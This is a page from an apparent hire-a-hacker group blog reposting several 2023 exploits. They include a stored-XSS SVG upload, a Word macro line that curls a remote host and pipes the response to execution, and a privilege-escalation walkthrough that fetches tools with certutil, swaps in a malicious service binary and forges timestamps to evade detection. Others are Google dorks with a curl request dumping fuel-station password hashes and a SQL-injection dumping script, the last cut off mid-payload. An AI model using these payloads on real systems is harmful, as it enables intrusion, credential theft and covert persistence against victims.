Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863118238

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Application: PHPFusion
Version: 9.10.30
Bugs:  XSS
Technology: PHP
Vendor URL: https://www.php-fusion.co.uk/home.php
Software Link: https://sourceforge.net/projects/php-fusion/
Date of found: 28-04-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>


poc request:


POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
Host: localhost
Content-Length: 1198
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="reqid"

187c77be8e52cf
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="cmd"

upload
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="target"

l1_Lw
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="mtime[]"

1681116842
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="overwrite"

0
------WebKitFormBoundaryxF2jB690PpLWInAA--


3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)



poc video : https://youtu.be/6yBLnRH8pOY
HireHackking 
# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
# Date: 2023-04-28
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://millegpg.it/
# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/
# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
# Version: 5.9.2
# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913
# CVE: CVE-2023-25438

MilleGPG / MilleGPG5 also known as "Governo Clinico 3"

Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.

Affected/tested version: MilleGPG5 5.9.2

Summary:
Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the
Italian general practice network.
MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,
complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the
General Practitioner, also offering contextual access to the most authoritative scientific content and CME training.

Vuln desc:
The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some
files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness
abusing the "write" permission of the main application available to all users on the system or network.


Details:
Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:

C:\Program Files\MilleGPG5\MilleGPG5.exe    (main gui application)
C:\Program Files\MilleGPG5\plugin\          (GPGCommand.exe, nginx and php files)
C:\Program Files\MilleGPG5\k-platform\      (api and webapp files)

such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA
HireHackking 
## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311

## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.

STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!

```vbs
  Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```

## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)

## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)

[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)

## Proof and Exploit
[href](https://streamable.com/s60x3k)

## Time spend:
01:00:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
# Date: 2023-04-23
# CVE: CVE-2023-2417
# Exploit Author: MrEmpy
# Vendor Homepage: https://www.ks-soft.net
# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
# Version: > 12.56
# Tested on: Windows 10 21H2


Title:
================
Advanced Host Monitor > 12.56 - Unquoted Service Path


Summary:
================
An unquoted service path vulnerability has been discovered in Advanced Host
Monitor version > 12.56 affecting the executable "C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when
the service's path is misconfigured, allowing an attacker to run a
malicious file instead of the legitimate executable associated with the
service.

An attacker with local user privileges could exploit this vulnerability to
replace the legitimate RMA-Win\rma_active.exe service executable with a
malicious file of the same name and located in a directory that has a
higher priority than the legitimate directory. That way, when the service
starts, it will run the malicious file instead of the legitimate
executable, allowing the attacker to execute arbitrary code, gain
unauthorized access to the compromised system, or stop the service from
functioning.

To exploit this vulnerability, an attacker would need local access to the
system and the ability to write and replace files on the system. The
vulnerability can be mitigated by correcting the service path to correctly
quote the full path of the executable, including quotation marks.
Furthermore, it is recommended that users keep software updated with the
latest security updates and limit physical and network access to their
systems to prevent malicious attacks.


Proof of Concept:
================

C:\>sc qc ActiveRMAService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveRMAService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files
(x86)\HostMonitor\RMA-Win\rma_active.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KS Active Remote Monitoring Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information # Date: 14 April, 2023 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://swagger.io/ # Version: < 4.1.3 # CVE: CVE-2018-25031 # Site: https://rafaelcintralopes.com.br/ # Usage: python swagger-exploit.py https://[swagger-page].com from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.chrome.service import Service import time import json import sys if __name__ == "__main__": target = sys.argv[1] desired_capabilities = DesiredCapabilities.CHROME desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"} options = webdriver.ChromeOptions() options.add_argument("--headless") options.add_argument("--ignore-certificate-errors") options.add_argument("--log-level=3") options.add_experimental_option("excludeSwitches", ["enable-logging"]) # Browser webdriver path drive_service = Service("C:/chromedriver.exe") driver = webdriver.Chrome(service=drive_service, options=options, desired_capabilities=desired_capabilities) driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json") time.sleep(10) driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json") time.sleep(10) logs = driver.get_log("performance") with open("log_file.json", "w", encoding="utf-8") as f: f.write("[") for log in logs: log_file = json.loads(log["message"])["message"] if("Network.response" in log_file["method"] or "Network.request" in log_file["method"] or "Network.webSocket" in log_file["method"]): f.write(json.dumps(log_file)+",") f.write("{}]") driver.quit() json_file_path = "log_file.json" with open(json_file_path, "r", encoding="utf-8") as f: logs = json.loads(f.read()) for log in logs: try: url = log["params"]["request"]["url"] if(url == "https://petstore.swagger.io/v2/hacked1.json"): print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json") if(url == "https://petstore.swagger.io/v2/hacked2.json"): print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json") except Exception as e: pass
HireHackking

AspEmail v5.6.0.2 - Local Privilege Escalation

HACKER · %s · %s

#################################################################################################################### # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation # # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # # Date: 13/04/2023 # # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # # Vendor Homepage: https://www.aspemail.com # # Software Link: https://www.aspemail.com/download.html # # Product: AspEmail # # Version: AspEmail 5.6.0.2 and all # # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU # # Tested on: Windows Server 2016 and Windows Server 2019 # # CVE : 0DAY # #################################################################################################################### # ================================================================================================================== [+] C:\PenTest>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled # ================================================================================================================== * First, we will test whether the AspEmail service is active. * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running: [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe EmailAgent.exe 4400 Persits Software EmailAgent or [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe EmailAgent64.exe 4400 Persits Software EmailAgent * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". * Now we know that AspEmail service is active. # ================================================================================================================== * We will need these: [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1" # ================================================================================================================== [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Name: Persits Software EmailAgent ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run User : LocalSystem ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN IdentityReference : Everyone Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse Status : Unknown UserCanStart : False UserCanStop : False [+] C:\PenTest>del PrivescCheck.ps1 * We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks. # ================================================================================================================== # [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail: Access is denied. * We do not have permission to access subdirectories. # ================================================================================================================== [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F) DeepSecLab\psacln:(I)(OI)(CI)(N) DeepSecLab\psaadm:(I)(OI)(CI)(N) DeepSecLab\psaadm_users:(I)(OI)(CI)(N) BUILTIN\Administrators:(I)(F) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX) NT SERVICE\TrustedInstaller:(I)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX) * Unlike other directories, we have full privileges in the "BIN" directory of the service. * This is chmod 0777 - rwxrwxrwx in linux language. # ================================================================================================================== [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators * We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user. # ================================================================================================================== * Now we will take ownership of this directory as we will execute our operations under the "BIN" directory. [+] C:\PenTest>whoami DeepSecLab\Hacker [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN" SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker". [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN Successfully processed 1 files; Failed processing 0 files * Ok. All commands resulted successfully. We now have full privileges for this directory. # ================================================================================================================== * Now we will modify the EmailAgent file and inject a self-written malware. * We will be careful not to damage any files while doing this so that all transactions can be easily undone. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free # ================================================================================================================== * We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28" [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe * And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect. * I used the Resource Tuner Console tool. >>> http://www.restuner.com/tour-resource-tuner-console.htm * This can be done easily with the Resource Tuner tool. >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html >>> http://www.restuner.com/download.htm # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 24.09.2003 09:21 12.288 EmailAgent.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free [24.09.2003 09:21] 12.288 EmailAgent.exe [24.09.2003 09:21] 167.936 Null.EmailAgent.exe * And time manipulation is over. They look like they were uploaded at the same time long ago. # ================================================================================================================== * Now we check for my malware ownership. [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28 [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name Name DeepSecLab\Hacker EmailAgent.exe Owner: DeepSecLab\Hacker # =================================================================================================================# # # #################################################################################################################### # #[EmailAgent.cs]# # #################################################################################################################### # # # * We program this malware in such a way that when the server is reboot(when the services are restarted), # * It will be triggered and execute the codes we want, # * And then send a printout of all this to the email address we specified. # # using System; # using System.Linq; # using System.Text; # using System.Diagnostics; # using System.IO; # using System.Collections; # # Namespace CliToolSpace # { # class _Main # { # static void Main(string[] args) # { # Cli commandLine = new Cli(); # commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); # commandLine.Execute(); # commandLine.ToFile(@"C:\Windows\Temp\"); # } # } # } # # # # #################################################################################################################### # #[Mail.cs]# # #################################################################################################################### # # # using System; # using System.Net.Mail; # using System.Net; # SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); # var mail = new MailMessage(); # mail.From = new MailAddress("mail@deepseclab.com"); # mail.To.Add("mail@hacker.com"); # mail.Subject = "Trigger Successful!"; # mail.IsBodyHtml = true; # string htmlBody; # htmlBody = "<strong>This server has been rebooted.</strong>"; # mail.Body = htmlBody; # Attachment attachment; # attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); # mail.Attachments.Add(attachment); # SmtpServer.Port = 587; # SmtpServer.UseDefaultCredentials = false; # SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); # SmtpServer.EnableSsl = true; # SmtpServer.Timeout = int.MaxValue; # SmtpServer.Send(mail); # # # # #################################################################################################################### # #[Run.bat]# # #################################################################################################################### # # # whoami > C:\Windows\Temp\Export.txt # cd C:\Program Files (x86)\Persits Software\AspEmail\Bin # del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe # cd c:\Windows\Tasks # del Run.bat & del Mail.exe # # # # #################################################################################################################### # # [+]Trigger Successful![+] # # [+] C:\PenTest>systeminfo | findstr "Boot Time" # System Boot Time: 13.04.2022, 07:46:06 # # # # #################################################################################################################### #[Export.txt]# # #################################################################################################################### # # # NT AUTHORITY\SYSTEM # # # # #################################################################################################################### # # # ================================================================================================================== # ...|||[FIX]|||... # # ================================================================================================================== # [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] # # =================================================================================================================# [+] C:\Administrator>sc qc "Persits Software EmailAgent" [SC] QueryServiceConfig SUCCESS SERVICE_Name: Persits Software EmailAgent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run LOAD_ORDER_GROUP : TAG : 0 DISPLAY_Name : Persits Software EmailAgent DEPENDENCIES : rpcss SERVICE_START_Name : LocalSystem # ================================================================================================================== [+] C:\Administrator>sc sdshow "Persits Software EmailAgent" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) # ================================================================================================================== [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com Persits Software EmailAgent Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS # ================================================================================================================== [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied. DONE! # ================================================================================================================== [+] C:\Administrator>sc stop "Persits Software EmailAgent" [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent" * These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore. # ==================================================================================================================
HireHackking

Franklin Fueling Systems TS-550 - Default Password

HACKER · %s · %s

# Exploit Title: Franklin Fueling Systems TS-550 - Default Password # Date: 4/16/2023 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/) # Version: TS-550 # Tested on: Linux/Android(termux) Step 1 : attacker can using these dorks and access to find the panel inurl:"relay_status.html" inurl:"fms_compliance.html" inurl:"fms_alarms.html" inurl:"system_status.html" inurl:"system_reports.html' inurl:"tank_status.html" inurl:"sensor_status.html" inurl:"tank_control.html" inurl:"fms_reports.html" inurl:"correction_table.html" Step 2 : attacker can send request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi Step 3 : if get response that show like this <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> Step 4 : attacker can crack the hashesh using john the ripper notice : most of the panels password is : admin Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
HireHackking

Chitor-CMS v1.1.2 - Pre-Auth SQL Injection

HACKER · %s · %s

#!/usr/bin/python3 ####################################################### # # # Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection # # Date: 2023/04/13 # # ExploitAuthor: msd0pe # # Project: https://github.com/waqaskanju/Chitor-CMS # # My Github: https://github.com/msd0pe-1 # # Patched the 2023/04/16: 69d3442 commit # # # ####################################################### __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.' __author__ = 'msd0pe' __version__ = '1.1' __date__ = '2023/04/13' class bcolors: PURPLE = '\033[95m' BLUE = '\033[94m' GREEN = '\033[92m' OCRA = '\033[93m' RED = '\033[91m' CYAN = '\033[96m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' class infos: INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] " ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] " GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] " PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] " import re import requests import optparse from prettytable import PrettyTable def DumpTable(url, database, table): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() columns = [] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: columns.append(i) pass except: pass x.field_names = columns payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: i = i.split("xzmdpl") x.add_rows([i]) except ValueError: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: i = i.split("xzmdpl") i.append("") x.add_rows([i]) print(x) def ListTables(url, database): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["TABLES"] payload = "/edit_school.php?id=-2164' UNION ALL SELECT 